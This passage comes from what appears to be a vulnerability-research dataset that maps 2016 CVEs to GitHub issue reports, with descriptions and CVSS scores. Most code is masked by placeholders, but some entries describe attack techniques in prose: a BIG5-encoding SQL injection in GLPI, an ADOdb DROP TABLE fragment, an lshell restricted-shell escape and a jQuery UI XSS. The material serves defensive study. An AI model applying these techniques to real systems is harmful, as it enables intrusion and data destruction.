  2829. "description": "CSRF vulnerability, again. I'm afraid that the issue hasn't been fixed properly. I realized it today after deploying your new release. You can try: login (or simply visit in a barebone new grails application) the main app website, but DON'T visit the console. Trigger the poc I sent you the last time, and you'll see that it'll still work. After accessing the console the protection will be effective and the poc will stop working. I suspect that the reason might be the APITAG check. If the console hasn't been visited yet, there will be no APITAG in the session, and thus both side of the equations will be null , letting the check pass.",
  2830. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2831. "severity": "HIGH",
  2832. "baseScore": 8.8,
  2833. "impactScore": 5.9,
  2834. "exploitabilityScore": 2.8
  2835. },
  2836. {
  2837. "CVE_ID": "CVE-2016-6521",
  2838. "Issue_Url_old": "https://github.com/sheehan/grails-console/issues/54",
  2839. "Issue_Url_new": "https://github.com/sheehan/grails-console/issues/54",
  2840. "Repo_new": "sheehan/grails-console",
  2841. "Issue_Created_At": "2016-07-01T08:57:42Z",
  2842. "description": "CSRF prevention. Same issue as URLTAG which was unfortunately not recognized for the severe bug that it is. Yesterday I explained privately the issue to MENTIONTAG and supplied him a POC. Will add the same information here once a fix is released (or otherwise to expedite its release), but for now this issue should merely serve to keep track of it publicly",
  2843. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2844. "severity": "HIGH",
  2845. "baseScore": 8.8,
  2846. "impactScore": 5.9,
  2847. "exploitabilityScore": 2.8
  2848. },
  2849. {
  2850. "CVE_ID": "CVE-2016-6582",
  2851. "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/875",
  2852. "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/875",
  2853. "Repo_new": "doorkeeper-gem/doorkeeper",
  2854. "Issue_Created_At": "2016-08-12T20:19:36Z",
  2855. "description": "Token revocation uses wrong authorization method. The FILETAG states that when revoking a token, \"the client also includes its authentication credentials as described in FILETAG \". The spec's example request for revocation looks like this: CODETAG Note the HTTP Basic authentication, not Bearer. The spec goes on to say that the authorization server \"first validates the client credentials (in case of a confidential client) and then verifies whether the token was issued to the client making the revocation request. If this validation fails, the request is refused and the client is informed of the error by the authorization server as described below\". It appears as though Doorkeeper instead authorizes the request using HTTP Bearer with an access token.",
  2856. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  2857. "severity": "CRITICAL",
  2858. "baseScore": 9.1,
  2859. "impactScore": 5.2,
  2860. "exploitabilityScore": 3.9
  2861. },
  2862. {
  2863. "CVE_ID": "CVE-2016-6902",
  2864. "Issue_Url_old": "https://github.com/ghantoos/lshell/issues/147",
  2865. "Issue_Url_new": "https://github.com/ghantoos/lshell/issues/147",
  2866. "Repo_new": "ghantoos/lshell",
  2867. "Issue_Created_At": "2016-08-17T18:39:58Z",
  2868. "description": "Restriction overrun via simple trick. If you run something like APITAG or APITAG it will exec bash command. This can be avoided by adding && and || to forbidden list, but still.",
  2869. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  2870. "severity": "CRITICAL",
  2871. "baseScore": 9.9,
  2872. "impactScore": 6.0,
  2873. "exploitabilityScore": 3.1
  2874. },
  2875. {
  2876. "CVE_ID": "CVE-2016-6903",
  2877. "Issue_Url_old": "https://github.com/ghantoos/lshell/issues/149",
  2878. "Issue_Url_new": "https://github.com/ghantoos/lshell/issues/149",
  2879. "Repo_new": "ghantoos/lshell",
  2880. "Issue_Created_At": "2016-08-17T19:36:05Z",
  2881. "description": "SECURITY ISSUE: Escape possible by using special keys. Just type APITAG , APITAG after any allowed command and then type desired restricted command: CODETAG",
  2882. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  2883. "severity": "CRITICAL",
  2884. "baseScore": 9.9,
  2885. "impactScore": 6.0,
  2886. "exploitabilityScore": 3.1
  2887. },
  2888. {
  2889. "CVE_ID": "CVE-2016-6905",
  2890. "Issue_Url_old": "https://github.com/libgd/libgd/issues/248",
  2891. "Issue_Url_new": "https://github.com/libgd/libgd/issues/248",
  2892. "Repo_new": "libgd/libgd",
  2893. "Issue_Created_At": "2016-07-05T04:45:01Z",
  2894. "description": "Out Of Bounds Read in gd_tga.c. Hi, I'd like to report a OOB read issue to you. This issue can be triggered when parsing a specially crafted tga image. You can compile APITAG with APITAG to reproduce this issue. ERRORTAG Credit to Ke Liu of Tencent's Xuanwu LAB . Thanks.",
  2895. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2896. "severity": "MEDIUM",
  2897. "baseScore": 6.5,
  2898. "impactScore": 3.6,
  2899. "exploitabilityScore": 2.8
  2900. },
  2901. {
  2902. "CVE_ID": "CVE-2016-7051",
  2903. "Issue_Url_old": "https://github.com/FasterXML/jackson-dataformat-xml/issues/211",
  2904. "Issue_Url_new": "https://github.com/fasterxml/jackson-dataformat-xml/issues/211",
  2905. "Repo_new": "fasterxml/jackson-dataformat-xml",
  2906. "Issue_Created_At": "2016-09-22T05:04:42Z",
  2907. "description": "Default changes for APITAG , consider disabling DTD handling. Although XML specification defines DTD handling as part of core xml processing, for most XML use cases for networking systems DTDs are either not used, or are minority use case. Conversely use of DTDs is often actually an anti pattern considering access restrictions and overhead. With this in mind, it would probably make sense to change defaults to disable DTD processing and just allow changing settings to enable it for cases where it is needed, as opposed to the other way around. Compared to other default changes it would probably make sense to actually add a specific feature; but if not possible, then just simple setter for APITAG . Regardless it'd be easier to do this than to expect user to pre configure APITAG .",
  2908. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
  2909. "severity": "HIGH",
  2910. "baseScore": 8.6,
  2911. "impactScore": 4.0,
  2912. "exploitabilityScore": 3.9
  2913. },
  2914. {
  2915. "CVE_ID": "CVE-2016-7075",
  2916. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/34517",
  2917. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/34517",
  2918. "Repo_new": "kubernetes/kubernetes",
  2919. "Issue_Created_At": "2016-10-11T01:24:04Z",
  2920. "description": "Client certificate auth is using the subject CN from the intermediate CA cert, not from the end entity cert. APITAG Is this a request for help? (If yes, you should use our troubleshooting guide and community support channels, see FILETAG I tried slack, someone else ran in to my issue as well and just used separate CAs What keywords did you search in Kubernetes issues before filing this one? (If you have found any duplicates, you should instead reply there.): intermediate certificate Is this a BUG REPORT or FEATURE REQUEST? (choose one): FEATURE REQUEST APITAG Kubernetes version (use kubectl version ): Client Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG a git tree\", APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"darwin/amd NUMBERTAG Server Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Environment : Cloud provider or hardware configuration : aws OS (e.g. from /etc/os release): APITAG ID=coreos VERSION NUMBERTAG ERSION_ID NUMBERTAG BUILD_ID NUMBERTAG APITAG NUMBERTAG APITAG ANSI_COLOR NUMBERTAG HOME_URL=\" FILETAG \" BUG_REPORT_URL=\" CVETAG \" Kernel (e.g. ERRORTAG ): Linux ip NUMBERTAG APITAG NUMBERTAG coreos NUMBERTAG SMP Tue Sep NUMBERTAG UTC NUMBERTAG Intel(R) Xeon(R) CPU E NUMBERTAG GHz APITAG APITAG Install tools : kube aws Manually generated ssl certs Others : I'm using client cert+ABAC auth and have audit logging enabled. What happened : Clients using SSL certs for auth show the subject CN of their intermediate cert not their entity cert. I set the client cert to a certificate chain: APITAG Cert> APITAG Cert> APITAG Cert> ca.pem on all machines is set to the Root Cert What you expected to happen : I expect the client to use the Subject CN of the entity cert. The key I'm using is for the entity and the connection is secure, My audit logs just show the CN for the intermediate CA. How to reproduce it (as minimally and precisely as possible): Create a root CA cert Use it to sign an intermediate CA cert. Use root cert as CA, use certificate chain bundle as client cert, use correct client key Anything else do we need to know : I've never had the sub ca key file on any machine (it's in a yubikey) I'm seeing this in audit logs when I use the chain NUMBERTAG APITAG AUDIT: id NUMBERTAG f NUMBERTAG c d NUMBERTAG b af NUMBERTAG cca NUMBERTAG e6eee\" APITAG method=\"GET\" APITAG Key1 Sub CA\" as=\" APITAG \" namespace=\" APITAG \" PATHTAG When I set the ca.pem to my sub ca key and don't use my bundled certs, I see NUMBERTAG APITAG AUDIT: id NUMBERTAG c NUMBERTAG f e NUMBERTAG b NUMBERTAG a NUMBERTAG ca4ef NUMBERTAG ec\" APITAG method=\"GET\" user=\"kube worker\" as=\" APITAG \" namespace=\" APITAG \" PATHTAG",
  2921. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2922. "severity": "HIGH",
  2923. "baseScore": 8.1,
  2924. "impactScore": 5.9,
  2925. "exploitabilityScore": 2.2
  2926. },
  2927. {
  2928. "CVE_ID": "CVE-2016-7103",
  2929. "Issue_Url_old": "https://github.com/jquery/api.jqueryui.com/issues/281",
  2930. "Issue_Url_new": "https://github.com/jquery/api.jqueryui.com/issues/281",
  2931. "Repo_new": "jquery/api.jqueryui.com",
  2932. "Issue_Created_At": "2015-10-19T13:40:23Z",
  2933. "description": "XSS Vulnerability on APITAG option of Dialog APITAG UI. I couldn't submit the bug to the website CVETAG VULNERABILITY DETAILS A potential bug enables us to inject the XSS content into APITAG option using component ui dialog. As original of APITAG UI( URLTAG we shall not accept any HTML string inside it. VERSION Any site using the latest version APITAG UI NUMBERTAG REPRODUCTION CASE Create a new HTML page. Inject this content into new page. ERRORTAG A alert popup was shown. Completed. IN CONCLUSION We expect that the html string isn't allowed in the APITAG option as well as the popup alert not shown. If it displays, any attacker can take advantage of injecting the malicious XSS content into website. Please see details at here URLTAG",
  2934. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2935. "severity": "MEDIUM",
  2936. "baseScore": 6.1,
  2937. "impactScore": 2.7,
  2938. "exploitabilityScore": 2.8
  2939. },
  2940. {
  2941. "CVE_ID": "CVE-2016-7163",
  2942. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/826",
  2943. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/826",
  2944. "Repo_new": "uclouvain/openjpeg",
  2945. "Issue_Created_At": "2016-09-08T10:01:15Z",
  2946. "description": "CVETAG Integer overflow in opj_pi_create_decode. This issue is used to track CVETAG . Fixed by c NUMBERTAG bc NUMBERTAG URLTAG and ef NUMBERTAG f NUMBERTAG URLTAG . APITAG is available at FILETAG .",
  2947. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2948. "severity": "HIGH",
  2949. "baseScore": 7.8,
  2950. "impactScore": 5.9,
  2951. "exploitabilityScore": 1.8
  2952. },
  2953. {
  2954. "CVE_ID": "CVE-2016-7164",
  2955. "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/1021",
  2956. "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/1021",
  2957. "Repo_new": "arvidn/libtorrent",
  2958. "Issue_Created_At": "2016-08-21T12:56:33Z",
  2959. "description": "APITAG fault\" (possible APITAG when parsing compressed data with function \"inflate_gzip\". libtorrent version (or branch NUMBERTAG platform/architecture: Ubuntu NUMBERTAG LTS NUMBERTAG compiler and compiler version: gcc version NUMBERTAG APITAG NUMBERTAG APITAG The issue was found with \"afl fuzzer\" while executing a modified version of the \"test_gzip\" testsuite with the following input data(displayed in base NUMBERTAG format): CODETAG A segmentation fault signal was captured while running: APITAG The output from ASAN: ERRORTAG The issue seems to be located in the puff.cpp file inside the \"construct\" function. To reproduce NUMBERTAG compile APITAG (here attached NUMBERTAG copy the base NUMBERTAG encoded data to a file (ex. APITAG NUMBERTAG decode the file to a new file (\"base NUMBERTAG d gzip_data.b NUMBERTAG gzip_data NUMBERTAG run ./test_gzip gzip_data FILETAG",
  2960. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2961. "severity": "HIGH",
  2962. "baseScore": 7.5,
  2963. "impactScore": 3.6,
  2964. "exploitabilityScore": 3.9
  2965. },
  2966. {
  2967. "CVE_ID": "CVE-2016-7166",
  2968. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/660",
  2969. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/660",
  2970. "Repo_new": "libarchive/libarchive",
  2971. "Issue_Created_At": "2016-02-21T16:19:23Z",
  2972. "description": "Possible denial of service using a crafted gzip file. This isse has been reported by me on the APITAG bugtracker CVETAG . The mentioned example file has been attached to the bug report there which is reproduced below. > The APITAG tar NUMBERTAG program uses a heuristic to check if an archive file is compressed. If it is, it calls into an appropriate library to receive a decompressed stream. Then it applies the heuristic again to catch the case of an archive that has been compressed multiple times. There is no limit to the number of recursive decompressions. > > Using a crafted gzip file (the attached file is a quine that unpacks to itself), one can get tar NUMBERTAG to invoke an infinite chain of gzip compressors until all the memory on the machine running tar NUMBERTAG has been exhausted or another resource limit kicks in. > > I see this behaviour as a bug and security problem. It can be used to perform denial of service attacks against machines that run APITAG and use tar NUMBERTAG to list the contents of untrusted archives.",
  2973. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2974. "severity": "MEDIUM",
  2975. "baseScore": 5.5,
  2976. "impactScore": 3.6,
  2977. "exploitabilityScore": 1.8
  2978. },
  2979. {
  2980. "CVE_ID": "CVE-2016-7405",
  2981. "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/226",
  2982. "Issue_Url_new": "https://github.com/adodb/adodb/issues/226",
  2983. "Repo_new": "adodb/adodb",
  2984. "Issue_Created_At": "2016-04-17T00:52:12Z",
  2985. "description": "SECURITY: ADODB qstr does not quote properly with PDO. In ADODB NUMBERTAG using the PDO driver results in qstr not behaving properly, leading to SQL injection. The same method called with the APITAG driver works as expected. Example code: CODETAG Example results: CODETAG Note the unescaped backslash and different style of single quote escaping in the ADODB PDO example. This is an exploitable vulnerability: Exploit code: ERRORTAG Exploit results: CODETAG APITAG NUMBERTAG for \"; DROP TABLE APITAG",
  2986. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2987. "severity": "CRITICAL",
  2988. "baseScore": 9.8,
  2989. "impactScore": 5.9,
  2990. "exploitabilityScore": 3.9
  2991. },
  2992. {
  2993. "CVE_ID": "CVE-2016-7420",
  2994. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/277",
  2995. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/277",
  2996. "Repo_new": "weidai11/cryptopp",
  2997. "Issue_Created_At": "2016-09-15T21:07:01Z",
  2998. "description": "Library documentation lacks treatment of DNDEBUG and Static Initialization. From a recent discussion with the Debian Security Team: > On Thu, Sep NUMBERTAG at NUMBERTAG PM, Jeffrey Walton < EMAILTAG > wrote: > > Thanks Florian. > > > >> this matter does not seem to be something for the Debian security > >> team. Debian doesn't enable coredumps by default, and crypto++ > >> upstream doesn't document that builds without DNDEBUG are unsafe > >> (say, due to denial of service issues caused by broken asserts). > > > > Fair enough, done. We added information to both FILETAG and > > APITAG see > > URLTAG > > . > > > > Are there other places we should disseminate the information? I want > > to ensure you are looking in places I expect you to look (i.e., we are > > not suffering a disconnect). > > For completeness, the asserts are working as expected; they are not broken. The problem is many distros and developers fail to add APITAG for release/production when using the alternate build system, like Autotools and APITAG Sometimes its policy APITAG and Autotools) and sometimes its omission (regular developers under APITAG The library's build system, [GNU] Make, adds the define. The library is well configured in its default state.",
  2999. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  3000. "severity": "MEDIUM",
  3001. "baseScore": 5.9,
  3002. "impactScore": 3.6,
  3003. "exploitabilityScore": 2.2
  3004. },
  3005. {
  3006. "CVE_ID": "CVE-2016-7445",
  3007. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/843",
  3008. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/843",
  3009. "Repo_new": "uclouvain/openjpeg",
  3010. "Issue_Created_At": "2016-09-16T09:51:59Z",
  3011. "description": "null ptr dereference in APITAG Vulnerability openjpeg null ptr dereference in APITAG Version git head version ( URLTAG ) Address Sanitizer Output ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ff NUMBERTAG sp NUMBERTAG ff NUMBERTAG T NUMBERTAG d NUMBERTAG in skip_white PATHTAG NUMBERTAG d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG a NUMBERTAG b in _start ??:? APITAG See poc.ppm Analysis In APITAG and APITAG variable s is uncheck after skip_int is called. A null ptr will be passed to skip_int again and will cause a null ptr dereference. Report Timeline NUMBERTAG FB3F NUMBERTAG of STARLAB discovered this issue Credit FB3F NUMBERTAG of STARLAB APITAG Contact us if you need APITAG file",
  3012. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3013. "severity": "HIGH",
  3014. "baseScore": 7.5,
  3015. "impactScore": 3.6,
  3016. "exploitabilityScore": 3.9
  3017. },
  3018. {
  3019. "CVE_ID": "CVE-2016-7507",
  3020. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2483",
  3021. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2483",
  3022. "Repo_new": "glpi-project/glpi",
  3023. "Issue_Created_At": "2017-07-19T07:52:19Z",
  3024. "description": "Stored XSS and CSRF exploit. CVETAG CVETAG Thanks to Eric Carter (CS) Should be already fixed by fc NUMBERTAG a1",
  3025. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  3026. "severity": "HIGH",
  3027. "baseScore": 8.0,
  3028. "impactScore": 5.9,
  3029. "exploitabilityScore": 2.1
  3030. },
  3031. {
  3032. "CVE_ID": "CVE-2016-7508",
  3033. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/1047",
  3034. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/1047",
  3035. "Repo_new": "glpi-project/glpi",
  3036. "Issue_Created_At": "2016-09-23T13:29:00Z",
  3037. "description": "SQL injection with SET NAMES. CVETAG Thanks to Eric Carter (CS) APITAG Vectors] Prerequisite: the administrator of GLPI must have defined the variable $dbenc='big5' in PATHTAG to support asian encoding. It will then be possible to do SQL injection in almost all the forms of the application. For the proof of concept, the attacker targeted the APITAG form input in the User profile by adding the characters [ELIDED] before the SQL code (the request must be sent using Unicode encoding) :[ELIDED]', APITAG x Once received by the server, the request will be sanitized, giving :[ELIDED] , APITAG x The value will then be sent to the database with a BIG5 encoding. Here is the critical point, as BIG5 will see the string [ELIDED]\\ as a single asian character encoded on two bytes. As the single quote isn't escaped anymore, the SQL code will be executed and will set the password of every account to the value APITAG (=MD5 hash of \"ximaz\" string)",
  3038. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  3039. "severity": "HIGH",
  3040. "baseScore": 7.5,
  3041. "impactScore": 5.9,
  3042. "exploitabilityScore": 1.6
  3043. },
  3044. {
  3045. "CVE_ID": "CVE-2016-7514",
  3046. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/83",
  3047. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/83",
  3048. "Repo_new": "imagemagick/imagemagick",
  3049. "Issue_Created_At": "2016-01-13T11:40:06Z",
  3050. "description": "out of bounds read in APITAG APITAG CVETAG",
  3051. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3052. "severity": "MEDIUM",
  3053. "baseScore": 6.5,
  3054. "impactScore": 3.6,
  3055. "exploitabilityScore": 2.8
  3056. },
  3057. {
  3058. "CVE_ID": "CVE-2016-7515",
  3059. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/82",
  3060. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/82",
  3061. "Repo_new": "imagemagick/imagemagick",
  3062. "Issue_Created_At": "2016-01-13T03:15:41Z",
  3063. "description": "heap buffer overflow in APITAG APITAG CVETAG",
  3064. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3065. "severity": "MEDIUM",
  3066. "baseScore": 6.5,
  3067. "impactScore": 3.6,
  3068. "exploitabilityScore": 2.8
  3069. },
  3070. {
  3071. "CVE_ID": "CVE-2016-7516",
  3072. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/77",
  3073. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/77",
  3074. "Repo_new": "imagemagick/imagemagick",
  3075. "Issue_Created_At": "2016-01-13T03:14:08Z",
  3076. "description": "out of bounds read in APITAG APITAG CVETAG",
  3077. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3078. "severity": "MEDIUM",
  3079. "baseScore": 6.5,
  3080. "impactScore": 3.6,
  3081. "exploitabilityScore": 2.8
  3082. },
  3083. {
  3084. "CVE_ID": "CVE-2016-7517",
  3085. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/80",
  3086. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/80",
  3087. "Repo_new": "imagemagick/imagemagick",
  3088. "Issue_Created_At": "2016-01-13T03:15:09Z",
  3089. "description": "heap buffer overflow in APITAG APITAG CVETAG",
  3090. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3091. "severity": "MEDIUM",
  3092. "baseScore": 6.5,
  3093. "impactScore": 3.6,
  3094. "exploitabilityScore": 2.8
  3095. },
  3096. {
  3097. "CVE_ID": "CVE-2016-7518",
  3098. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/81",
  3099. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/81",
  3100. "Repo_new": "imagemagick/imagemagick",
  3101. "Issue_Created_At": "2016-01-13T03:15:26Z",
  3102. "description": "heap buffer overflow in APITAG APITAG CVETAG",
  3103. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3104. "severity": "MEDIUM",
  3105. "baseScore": 6.5,
  3106. "impactScore": 3.6,
  3107. "exploitabilityScore": 2.8
  3108. },
  3109. {
  3110. "CVE_ID": "CVE-2016-7520",
  3111. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/90",
  3112. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/90",
  3113. "Repo_new": "imagemagick/imagemagick",
  3114. "Issue_Created_At": "2016-01-22T21:50:37Z",
  3115. "description": "heap buffer overflow in APITAG CVETAG",
  3116. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3117. "severity": "MEDIUM",
  3118. "baseScore": 6.5,
  3119. "impactScore": 3.6,
  3120. "exploitabilityScore": 2.8
  3121. },
  3122. {
  3123. "CVE_ID": "CVE-2016-7521",
  3124. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/92",
  3125. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/92",
  3126. "Repo_new": "imagemagick/imagemagick",
  3127. "Issue_Created_At": "2016-01-24T01:28:42Z",
  3128. "description": "heap buffer overflow in APITAG CVETAG",
  3129. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3130. "severity": "MEDIUM",
  3131. "baseScore": 6.5,
  3132. "impactScore": 3.6,
  3133. "exploitabilityScore": 2.8
  3134. },
  3135. {
  3136. "CVE_ID": "CVE-2016-7522",
  3137. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/93",
  3138. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/93",
  3139. "Repo_new": "imagemagick/imagemagick",
  3140. "Issue_Created_At": "2016-01-24T01:28:55Z",
  3141. "description": "heap buffer overflow in APITAG CVETAG",
  3142. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3143. "severity": "MEDIUM",
  3144. "baseScore": 6.5,
  3145. "impactScore": 3.6,
  3146. "exploitabilityScore": 2.8
  3147. },
  3148. {
  3149. "CVE_ID": "CVE-2016-7523",
  3150. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/94",
  3151. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/94",
  3152. "Repo_new": "imagemagick/imagemagick",
  3153. "Issue_Created_At": "2016-01-24T01:29:08Z",
  3154. "description": "heap buffer overflow in APITAG CVETAG",
  3155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3156. "severity": "MEDIUM",
  3157. "baseScore": 6.5,
  3158. "impactScore": 3.6,
  3159. "exploitabilityScore": 2.8
  3160. },
  3161. {
  3162. "CVE_ID": "CVE-2016-7524",
  3163. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/96",
  3164. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/96",
  3165. "Repo_new": "imagemagick/imagemagick",
  3166. "Issue_Created_At": "2016-01-24T01:29:30Z",
  3167. "description": "heap buffer overflow in APITAG CVETAG",
  3168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3169. "severity": "MEDIUM",
  3170. "baseScore": 6.5,
  3171. "impactScore": 3.6,
  3172. "exploitabilityScore": 2.8
  3173. },
  3174. {
  3175. "CVE_ID": "CVE-2016-7525",
  3176. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/98",
  3177. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/98",
  3178. "Repo_new": "imagemagick/imagemagick",
  3179. "Issue_Created_At": "2016-01-24T01:29:49Z",
  3180. "description": "heap buffer overflow in PATHTAG CVETAG",
  3181. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3182. "severity": "MEDIUM",
  3183. "baseScore": 6.5,
  3184. "impactScore": 3.6,
  3185. "exploitabilityScore": 2.8
  3186. },
  3187. {
  3188. "CVE_ID": "CVE-2016-7526",
  3189. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/102",
  3190. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/102",
  3191. "Repo_new": "imagemagick/imagemagick",
  3192. "Issue_Created_At": "2016-01-28T12:55:52Z",
  3193. "description": "out of bounds write in PATHTAG CVETAG",
  3194. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3195. "severity": "MEDIUM",
  3196. "baseScore": 6.5,
  3197. "impactScore": 3.6,
  3198. "exploitabilityScore": 2.8
  3199. },
  3200. {
  3201. "CVE_ID": "CVE-2016-7527",
  3202. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/122",
  3203. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/122",
  3204. "Repo_new": "imagemagick/imagemagick",
  3205. "Issue_Created_At": "2016-02-05T00:53:51Z",
  3206. "description": "out of bounds read in APITAG CVETAG",
  3207. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3208. "severity": "MEDIUM",
  3209. "baseScore": 6.5,
  3210. "impactScore": 3.6,
  3211. "exploitabilityScore": 2.8
  3212. },
  3213. {
  3214. "CVE_ID": "CVE-2016-7528",
  3215. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/99",
  3216. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/99",
  3217. "Repo_new": "imagemagick/imagemagick",
  3218. "Issue_Created_At": "2016-01-24T01:29:58Z",
  3219. "description": "SEGV in APITAG CVETAG",
  3220. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3221. "severity": "MEDIUM",
  3222. "baseScore": 6.5,
  3223. "impactScore": 3.6,
  3224. "exploitabilityScore": 2.8
  3225. },
  3226. {
  3227. "CVE_ID": "CVE-2016-7529",
  3228. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/104",
  3229. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/104",
  3230. "Repo_new": "imagemagick/imagemagick",
  3231. "Issue_Created_At": "2016-01-28T12:56:13Z",
  3232. "description": "out of bounds read in APITAG CVETAG",
  3233. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3234. "severity": "MEDIUM",
  3235. "baseScore": 6.5,
  3236. "impactScore": 3.6,
  3237. "exploitabilityScore": 2.8
  3238. },
  3239. {
  3240. "CVE_ID": "CVE-2016-7529",
  3241. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/103",
  3242. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/103",
  3243. "Repo_new": "imagemagick/imagemagick",
  3244. "Issue_Created_At": "2016-01-28T12:56:03Z",
  3245. "description": "out of bounds read in APITAG CVETAG",
  3246. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3247. "severity": "MEDIUM",
  3248. "baseScore": 6.5,
  3249. "impactScore": 3.6,
